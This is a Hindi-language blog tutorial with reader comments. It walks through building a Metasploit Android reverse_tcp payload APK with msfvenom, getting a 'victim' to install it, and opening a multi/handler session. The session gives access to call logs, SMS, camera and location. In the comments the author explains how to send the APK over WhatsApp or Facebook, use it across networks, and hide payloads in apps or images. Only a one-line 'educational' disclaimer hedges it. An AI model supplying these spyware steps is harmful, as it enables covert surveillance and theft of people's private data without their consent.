How To Hack Any Android Phone Using Kali Linux in hindi? अगर आप kali linux से किसी का android smartphone hack करना चाहते हो तो आज इस पोस्ट में मैं आपको free में kali linux से ख़ुद का एक spy app (payload) बनाने का तरीक़ा बताऊँगा, और हम जानिंगे की आसानी से Kali Linux Se Android Mobile Hack Kaise Kare?
दोस्तों अगर आप किसी का android smartphone हैक (spy) करना चाहते हो तो spy apps एक best method है। लेकिन ज़्यादातर सभी spy apps paid होता है। तो अगर आप free में spy करना चाहते हो तो आप kali linux की help से आसानी से ख़ुद का spy app (payload apk) create कर सकते हो।
- Android Mobile Hacked Hai Ya Nahi Kaise Pata Kare
- Ek Message Send Karke Kisi Ka Bhi Mobile Hack Kaise Kare
इसलिए आज इस पोस्ट में मैं आपको बताऊँगा की आसानी से ख़ुद का Payload Apk बनाकर Kali Linux Se Kisi Ka Bhi Android Mobile Hack Kaise Kare?
दोस्तों अगर आपको नही पता की काली लिनक्स क्या होता है? तो Kali Linux क्या है? कंप्यूटर में Install कैसे करें? उसके बारे में मैंने पहेले से ही डिटेल से बताया हुआ है, और अगर आप android mobile hack करने के all methods जानना चाहते हो तो आप Android Mobile Hack Kaise Kare? Mobile Hack Karne Ka Tarika का यह पोस्ट पढ़ सकते हो।
इसके एलवा Kali Linux Se Facebook Account Hack Kaise Kare और Kali Linux से किसी के भी कंप्यूटर को हैक कैसे करें? उसकी पूरी जानकारी यहाँ है। अगर आपका interest ethical hacking में है, तो Ethical Hacking क्या है? – What Is Hacking In Hindi ओर हैकर (Hacker) कैसे बने और हैकिंग कैसे सीखें? उसकी पूरी जानकारी यहाँ है।
Alert: यह पोस्ट सिर्फ Educational Purpose के लिए है , इसका कोई भी गलत उपयोग ना करे. 😉
Kali Linux Se Android Mobile Hack Kaise Kare?
Kali Linux से किसी के भी android smartphone को हैक करने के लिए सबसे पहेले आपको एक payload create करना होगा, नीचे बताए गये steps को carefully read करे.
Step1: सबसे पहेले अपने kali linux operating system में terminal को open करे, और नीचे दिए गये command को type करे;
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.208 R > LPORT=4444 /root/futuretricks.apk
msfvenom:
यह एक kali linux का tool है, जिसको mostly reverse engineering में use किया जाता है।
-p android/meterpreter/reverse_tcp:
p for payload और यहाँ पर आप अपने android के लिए एक payload create कर रहे हैं, इसलिए यहाँ पर android लिखिंगे।
lhost:
यहाँ पर आपको अपना local ip address डालना है।
*अपना ip address check करने के लिए kali linux में आपको एक new terminal open करना है, और ifconfig cmd type करना है।
lport:
यहाँ पर आपको अपना local port set करना है, 4444 की जगह आप कुछ और भी set कर सकते हो।
/root/futuretricks.apk:
यह आपके payload का name or path है, इसकी जगह आप कुछ और भी लिख सकते हो। ex: yourname.apk
ऊपर बताए गये पूरे cmd को type करने के बाद enter press करे। और आपके सामने कुछ इस type का window show होगा.
Step2: अब आपका Payload create हो चुका है। root folder में आपको आपका payload मिल जाएगा।
Step3: अब आपको इस payload (futuretricks.apk) को victim को send करना है। और बस किसी भी तरह आपको victim के फ़ोन में एक बार इसको बस install कर देना है।
यह भी पढ़े: Kali Linux Se WiFi Ka Password Hack Kaise Kare [Detailed Guide]
Victim के android phone में payload के open होने के बाद आपको अपने Kali Linux PC में नीचे बताए गये cmd को एक एक करके enter करना है।
Step4: अपने kali linux terminal में सबसे पहेले आपको msfconsole type करना है।
Step5: अब आपके pc में metasploit framework console start हो जाएगा। इसमें थोड़ा समय लग सकता है, to have patience 😉
Step6: metasploit framework console open होने के बाद नीचे दी गयी commands को एक करके type करना है।
use exploit multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.111 (yha par aapko apna local ip daalna hai)
set lport 4444
exploit
जैसे ही आप एक एक करके इन सब commands को enter करोगे, आप अपने victim के android phone से connect हो जाओगे। (अगर आपके victim ने payload apk को open किया होगा तो!)
Step7: अब आपने अपने victim के android smartphone को hack कर लिया है।
अब आप उसकी बहुत सी personal detail like: call log, sms log, front & back camera snapshot, send a message, location और भी बहुत कुछ देख सकते हो।
आप अपने victim के smartphone के साथ किस किस command से क्या क्या कर सकते हो? यह सब देखने के लिए अपने terminal में help type करे।
तो दोस्तों इस तरह से आप एक meterpreter payload बनाकर किसी के भी android mobile को हैक और spy कर सकते हो, और वो भी बहुत ही आसानी से!
यह भी पढ़े:
- मोबाइल हैक कैसे करे?
- कंप्यूटर हैक कैसे करे?
- वेबसाइट हैक कैसे करे?
- फेसबुक अकाउंट कैसे हैक करे?
- WhatsApp हैक कैसे करे?
- इंस्टाग्राम अकाउंट हैक कैसे करे?
उम्मीद है की अब आपको kali linux से android mobile phone hack करने का तरीक़ा मालूम पढ़ गया होगा, और आप जान गये होगे की आसानी से Kali Linux Se Android Mobile Hack Kaise Kare?
अगर आपके पास इस पोस्ट से रिलेटेड कोई सवाल है तो नीचे कमेंट करे. और अगर पोस्ट पसंद आया हो तो सोशल मीडिया पर शेयर भी कर दे.
Hello such a great and informative article. Thanks for sharing.
internet ka hona jaroori hai
Yes.
Data download krne ke liye victim ke phone me internet zaroori h tabhi hm apni pc me data download kr payenge victim ke phone ka..
ha
Bro se link paid hai
kon sa?
agar mera dost kali linux se mera phone hack kar diya hai to kya kare
read this article.
Gaurav my name is Avinash or maine kuch time pahle kali use karna start kiya hai for hack android phone but har baar im fail muje bas ek baat btayo mere wife se connect hu to maine kaise kali linux use kar skta hu jab main new terminal open kar ke ipconfig command dalta hu to muje 10.0.2.15 IP show karta hai or muje kisi ne btya tha gar aap ke yhais type ka IP show kare to iska mtlb virtualbox dang se work nahi kar rha hai so please help me muje kya direct Lan ke sath attach hona jaruri hai ya fir main wifi ke jriye b hacking kar sta hu ? please help me
avinash read this article.
Thank you so much Gaaurav 🙂
Hi Gaurav i need your help again kya aap muje bataa sakta hai after hackn adroid phone hum kaise us phone ka social media check and download kar sakta hai kiyoki jab help command dene ke baad muje aisa koi option nahi mila please help me
aap esse victim ke social media account ko hack nhi kar sakte. but aap real time screenshot le sakte ho victim ke phone se. social media account ko spy karne ke liye apko yeh article help karega.
ok to kya hum uske SDCARD ka data download kar sakte hai like images, videos etc.?
yes aap sd card ke data ko read & write kr sakte ho.
ok par kaise kis command ka use karna hoga muje
es topic par jaldi he post karunga.
SIR SD CARD KI DATA COPY KIS TRH KR SAKTE HAI HELP ME PLIZ MYNE KALILUNIX PC ME BOOT KAR LIYA HAI PAR OPRATE KRNE NAHI AA RHA HAI
follow the steps.
ok gaurav just tell me 1 thing jab b main khud ka phone try karta ho to vo hack ho jata hai i thing vo same network me hota hai is liye ho jata hai but jab main apne kisi friend ka try karta just for demo vo nahi hota hai jab ki vo app install kar leta hai but me terminal me vo connect nahi hota ?
avinash aap payload creare karte time local port or set karo. like this: “MSFVENOM -P ANDROID/METERPRETER/REVERSE_TCP LHOST=172.16.27.208 LPORT=4444 R > /ROOT/FUTURETRICKS.APK” or exploit karte time bhi: set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.111
set lport 4444
exploit
me es article ko jaldi he update kar dunga.
gaurav main same aise hi karta hu but mere room par wifi hai or us wifi ko 7 boys use karte hai or wifi ka port number nahi mil rhaa hai main ye janna chahta hu ki wifi me dang se work karta hai kali linux for android ? kiyoki jab create ki hui aap main same wifi me kisi android phone me use karta hu to vo work karti hai but jab kisi or network me apne friends se intall karwata hu for demo vha work nahi karti please help me.
bhai me es baare me jaldi he ek complete post karunga. wese aap kisi bhi network par payload ko esploit kar sakte ho.
gaurav can we talk on phone if possible for you please i need your some help
msg me on facebook.
this is nyc and very helpful post for the hacker thank for the sharing this information hum isse hack he nahi apne mobiles ko hack hone se bacha bhi sakte hai.
ha bilkul.
bahut Hi Behtrin @Adip
thanks & keep visit @Ravi
ager apk uninstall kar da to kaya phir b hum us k mobile read kar sakta ha.?
nhi.
Sir kali linux mobile me nhi create kar sakte kya
9935612779
Sir kali linux mobile me create ho sakta hi
look: Android मोबाइल में Kali Linux कैसे Install करें?
Comment:bina internet connection ke kali linux se android mobile hack kar sakte hai
nhi.
Hi gaurav…
Mere friend ka fb mere messanger mai login hai usne apni fb ka password change kr dala hai but messanger abhi bhi mujme login hai to muje ye Jan na hai k mai messanger k thrue kaise fb ka password pata karu??? Forgt kr nhi skta..
not possible.
android phone hack karne ke baad kaise sara data downlod karain
kon sa data download karna hai?
Sir Kya victim k phone m bagair Kuchh kiye uske imei number se uska phone hack kr skte h
ispar jald hi detailed post share karunga, keep visit.
Sir, ye bataye ki kali linux se jo payload create kiya h wo victim ko send krnege to uske phone ki details dekhne ke liye victim ke phone me internet hona zaroori h…
yes
Sir victim ko payload send krne ke baad victim ke phone me internet connection hona zaroori h tabhi hm uske phone ko access kr payenge …
yes
Or sir agar wo app ko uninstall kr le tb bhi hm uska phone access kr payenge
nhi
sir mera payload nahi ban raha hai jo command aapne diya hai ise type karne pr kuch hota hi nahi hai m kya kru
thik se steps follow kro.
sir victom ko payload sand kaishe kre :sir m fb ka cloan page bnaya but send kaishe kre pata nahi chal raha hai.
aap facebook, whatsapp, instagram kahin par bhi send kar sakte ho.
sir please tell me i hope ki ap detail se bta sakte hai jaise payload create ho chuka hai kya isko copy karne ke baad return win7 me whatsapp install hai usme paste karke hi kiya ja sakta hai ki kali linux me hi alg se application download karna padega sir please tell me can i help me please sir i am waiting
matlab?
Sir kali linux me victim ke kisi bhi tarah ka data apne pc me download krne ke liye victim ke phone me net pack hona zaroori h ya hmre pc me jisme kali linux install kia h..
dono me
Sir victim ke andriod phone me net ki kya zaroorat h hm to uska phone door se hi chala sakte h.. pc me internet connection ki zaroorat hogi agar hm
Kisi tarah ka data download krte h apni pc me to hena sir..
aapke pc or victim ke phone dono me net connect hona chaiye.
Ok
Or sir kali linux me victim ke phone ke kisi bhi tarah ke data ko apne computer me save krne ka mtlb download krna hi hota h…
ha
Sir agar trojen virus kisi file ka sath attach hoker aa jaye or hm us file ko delete kr de to trojen bhi delete ho jayega.
some cases me.
Mtlb sir samjhe nhi.
kabhi kabhi delete ho bhi jata hai, or kabhi nhi bhi hota.
Or kya sir kisi bhi website pr jakar kisi bhi link ko sirf click krne per bhi phone hack ho sakta h mtlb us link se kch download na kre bs link per click krde to bhi hack ho sakta h.
nhi.
Sir agar hmre phone me trojen virus aa gya h to hme kaise pta chalega…
look: Android Mobile Hacked Hai Ya Nahi Kaise Pata Kare
Or sir agar hme internal memory or sd card ka data pc me laana h to usse bhi download krna padega…
ha
Or sir jaise hm sd card ka koi bhi data download krenge to pehle sir victim ke phone se sd card ka data upload hota hoga kali linux me tabhi hm uss data ko apne pc me download kr payenge aisa hi hota hoga sir…
direct uske phone se apke pc par aa jayega.
To sir jaise direct uske phone se pc per data aayega to uske liye uske phone me net hona zaroori h tabhi aa payega..
ha
Or sir uske call , sms bhi direct aa jayenge ya unhe download krna padega…
help cmd se check kr sakte ho saari detail.
Sir ip address ke jariye bhi koi hmre phone ko door baithe control kar sakta h kya i mean chala sakta h….
nhi.
Aisa hi hota h sir..
Sir ye payload create krte tym isme ip address kyun daala jaata h isme ip address ka kya use h…
read the article carefully.
Nd sir agar koi hmre phone ko door baithe chalata h jaise koi bhi app to wo app hmre phone me bhi chalne lagega kya jaise koi hacker hmre photos wagrah dekh rha h to gallery app hmre phone me chalne lagega kya….
nhi.
Sir agar koi hmre phone ko door baithe chalata h to wo app hmre phone me chalna to chahiye kyunki wo ek tareeke se hmra phone hi to chala rha h…
door baith ke koi apka phone nhi chla sakta, sirf apke data ko access kar sakta hai like: gallery photos, whatsapp messages & more…
memory card ko read and write krne ka kya mtlb hota h…
usme kuch copy ya move krna.
Mtlb sir agar hm kali linux me kisi tarah ka data download krte h to hm usse copy krte h download nhi…
Sir jaise uske call sms hme apne pc me laane h to usse copy krna padega ya download..
ha
Kya krna padega download ya copy..
Ok
Sir kali linux me victim ke sd card ka data upload bhi kiya ja sakta h kya…
matlab?
I mean data backup bhi hota h kya kali linux me…
Sir agar hm sd card ke kisi bhi tarah ke data ko agar apne pc me copy krenge to net kharch hoga ya nhi data ko copy krne me like images….
sd card pc me insert krke karoge to net ki jarurat nhi hai.
Nhi sir kali linux me jo victim ka data show hota h usse copy krne me net ki zaroorat hoti….
yes.
Sir ek baat bataye ki jaise google photos app me storage 15 gb hoti h to kya kali linux me bhi storage hoti h….
aapke computer ke hard disk me jitni storage hai, wo hi count hoti hai. kali linux ek operating system hai.
sir aap bol rhe the ki sd card ka data direct pc per aa jayega to pc per data aane ke baad hme usse copy bhi krna padega…..
matlab?
Kch nhi sir..
Sir mac address se bhi koi hmra phone hack kr sakta h kya..
nhi.
Sir data ko apni pc me copy krne ke liye net ki zaroorat hoti h i mean net kharch hoga jaise hm sd card ka data copy krna chahte ho apni pc me to….
aap apne sdcard ko apne pc me insert krke without net data copy kar sakte ho.
Sir jaise kali linux me ip address dalne per jo victim ke phone ka data show hota h agar victim koi data apne phone se delete kr de to wo kali linux se bhi delete ho jayega kya….
agar download nhi kiya hoga to ho jayega.
Sir ip address dalne per data show kaise hone lagta h kya sara data ip address pe sara data upload ho jaata h kya….
Nd data download tabhi kr sakte h jab wo upload hua ho or sir agar data upload hua hoga ip address pe to kaise delete ho sakta h data kali linux se….
matlab?
wo apke payload ki wajah se hota hai, jo aapne victim ke phone me install kiya hai.
Nd sir victim ke kisi bhi tarah ke data ko copy krne ke baad paste krne ki bhi zaroorat padegi pc me….
matlab?
Mtlb sir ye jaise data copy krte h to paste bhi to krna padta h pc me..
Mtlb sir samjhe nhi…
kisi bhi tarah ka data download krne me net ki zaroorat hoti h
ha
Kisme net ki zaroorat hoti h pc me ya victim ke phone me..
dono me
Aisa nhi ho sakta ki hm data pe right click krke usse copy krke pc me paste krde jo chahiye ho iss tarah se bhi to data aa jayega
nhi.
And ye trojen apk victim ke phone ka data hacker ke server pe send kr data h kya tabhi hacker data ko apni pc me download kr paata h.
nhi, direct uske phone se download hota hai.
Agar uske phone me net nhi h to kya hm data download nhi kr payenge uske phone ka..
nhi.
Sir kisi bhi tarah ka data download krne ke liye victim ke phone me internet ka hona zaroori h ya nhi.
ha
Android mobile m used nhi hoga kya kali linux app
look: Android मोबाइल में Kali Linux कैसे Install करें
Sir kali linux me victim ke phone ka delete hua data bhi recover ho sakta h kya…
nhi.
Sir agar hm pc ka data recover krna chahte h to wo bhi kali linux me nhi hoga recover..
matlab?
Mtlb sir kali linux me data recover ho sakta h..
Sir kali linux me java phython ko bhi install kia jaata h to inko istall krne ka kya fayda hota h…
programs run krne ke liye..
Adip Gaurav ji hum iphone me kali linux kaise install kare plzz es topic pe ek blog write kijiyea…
here is the guide…
Sir, if we right-click on the data and paste it directly into our pc, then the data will come, so what is the need to download it?
this does not work like pc, you have to download.
Ok thanks
Mean sir, if we right click on the data and copy it and paste it directly in the pc, then that file will not work in the pc..
you have to download first..
Sir hm jo data download krte h wo kali linux se download h ya victim ke phone se..
victim ke phone se.
Sir ek baat bataye ki jaise hm agar andriod phone ke alawa koi doosre phone ke liye jaise java phone ke liye payload create krna chahe to ban sakta h…
ha ban sakta hai, but es method se nhi…
To sir eske liye kon sa method hoga…
u can google….
Nd sir aapne jo ye commands di h ye sirf andriod phone ke liye h ya her phone ke liye means agar hm kisi or phone ke liye payload create krna chahe jaise i phone ya symbian phone to uske liye yahi saari commands deker payload create kr sakte h….
only android.
Sir agar hm alag method se payload create kre doosre phone ke liye jaise java ya koi doosra phone to usme bhi data ko download hi krna padega jaise isme krte h agar hm koi data pc me laana ho…
yes.
Or sir data tk sirf pahuchne ke liye bhi net ki zaroorat hogi agar java phone ke liye ye payload create kre to jaise help command type krte h or data show hone lagta h to kali linux me show hone ke liye victim ke phone me net zaroori h…
ha
Mtlb sir agar hm data ko direct copy krke pc me paste kr de or usse download na kre to wo file pc me work nhi kregi like images, videos…
copy paste nhi hoga
Sir aapne jo payload create kia h isme permission automatic allow rehti h ya victim ko krni padti h permission allow…
install krte time permission show hoti hai.
Sir agar hme sirf or sirf data ko download krna h pc me to uske liye net ki zaroorat kaha hoti h victim ke phone me ya pc me…
dono me
Mtlb sir net ki zaroorat hoti h data ko download krne me jaise hm images ya koi video download kre to….
ha
Gaurav sir ye bataye ki wifi ke jariye bhi hm apne mobile ka data pc me transfer kr sakte h…
ha.
Sir usme bhi saari process aise hi hoti h jaise issme hoti h usme bhi data ko download kia jaata h but usme to koi net ki zaroorat nhi hoti h to isme kyun hoti h net ki zaroorat data ko download krne me….
wifi ke jariye data send krne ke liye aapke dono devices pas pas hone chaiye, or isme worldwide kahi se bhi kr sakte hain.
Sir jaise aap bta rhe h aisa to bluetooth se connect krne per hota h..
Sir mai aapka fraind hu sir mai aapka facebook fraind banana chahta hu
Sir agar is payload ko agar koi doosra insaan kali linux me chalaye to wo bhi hmra phone hack kr sakta h…
matlab?
Mtlb apne system ke kali linux me…
Sir isme apne hi system ka ip address kyun daala jaata h agar hm kisi or pc ka ip address daal de to….
nhi aapko apne system ka he daalna hai.
Sir aap bol rhe h ki iss app ko open krna zaroori h to open krne ke baad phone hmre pc se connect ho jayega to phir data ko download krne me net ki zaroorat kyun hogi…
aapke aur aapke victim dono ke pass internet hona chaiye.
Sir hm isme jo web camera ko open krte h to jo victim ke phone me jo camera app hota h wahi open hota h…
app open nhi hota, only camera.
Sir agar ye payload kisi file ke sath attach hokar hmre phone me aa jayega to ye payload hmri phone ki screen per show hoga ya hide rahega….
hide rahega.
Agar sir ye hide rahega to isse hm open kaise krenge apne bola h ki jab tk open nhi krenge tb tk ye work nhi krega….
us app ke andar hide rahega, jisko aap apne phone me install kroge.
Sir ye l port kya h ye kyun daala jaata h isse kya hota h…
Sir ye payload kisi images , songs ya kisi video ke sath bhi attach hoker aa sakta h hmre phone me….
yes.
sir agar ham esse whatsaap ka ditels nikalna chahe to nikaal skte hai kya
Sir agar images songs ke sath aa jaaye to kaise permission allow krenge payload ki….
android smartphone me nhi hota. windows pc me kar sakte ho payload ko images ke andar embed. then image open karte he payload run ho jayega, permission nhi mangega. & aap apne real name se cmnt kro…
Mtlb sir agar koi images ke sath iss payload ko attach krke kisi site per upload kr de or wo image hm download kr le or us image ko apne phone me open kr de to wo payload bhi run ho jayega….
yes
Sir agar ye apk kisi image ya song ke sath build hoker aa jaaye to hm kaise pta kr sakte h ki file ke sath ye attach hoker aaya h ya nhi….
aaj kal ke latest smartphones me inbuilt antivirus hota hai jo usko detect kr leta hai.
sir agar ham esse whatsaap ka ditels nikalna chahe to nikaal skte hai kya
look: WhatsApp हैक कैसे करे – Account हैक करने का 5 तरीका
Sir ek baat bataye agar hm victim ke phone ka koi bhi data download krne se pehle open krna dekhna chahe kali linux me to kr sakte h mtlb open krke dekhne ke baad download kre to aisa ho sakta h…
yes
Sir ek baat bataye jaise hm help command type krke enter krte h or victim ka data show hone lagta h to victim ke phone me net hona zaroori h tabhi show hoga ya sirf data ko download krne ke liye net ki zaroorat hoti h means sirf data tk pahuchne ke liye bhi net ki zaroorat hoti h…
net jaruri hai.
Mtlb sir victim ke phone me net hona zaroori h tabhi help command type krne per uska data hmre kali linux me show krega….
Kisme net zaroori h victim ke phone ka data show hone ke liye victim ke phone me ya pc me….
dono me
Sir ye payload online h ya offline…
internet connection hona chaiye…
Sir agar victim iss payload ko open krne ke baad apna phone ka net band kr de to sir uske phone ka saara data hmre kali linux me help command type krne per show hoga…
nhi, jab net on hoga tabhi show hoga.
Sir iss payload se hm victim ke phone ka wifi on kr sakte h…
nhi.
Sir iss payload ki tarah victim ke phone ke mac address se bhi victim ke phone ko access kr sakte h means hack…..
nhi.
Isme apna ip address dalana h ki victim ka aur kya dono same network se connect hone chahiye kya
apna ip daalna hai. network koi sa bhi ho…
Sir victim ke sdcard ke andar ke pics apne
Mobile me kaise download Kare…use karne ke all commands bata dijiye
Bahut hi badiya post share kare ho bhai
thanks bro
payload ko window desktop pe shere kaise kare ya whatsapp facebook pe sher kaise kare
aap whatsapp par share kr sakte ho.
i tried on my own phone. now please tell me what is the procedure to remove SING IN-TO NETWORK sign whenever opening mobile network data
simply uninstall the payload apk.
sir ye nhi ho rha h mene bhot bar try kiya plz help me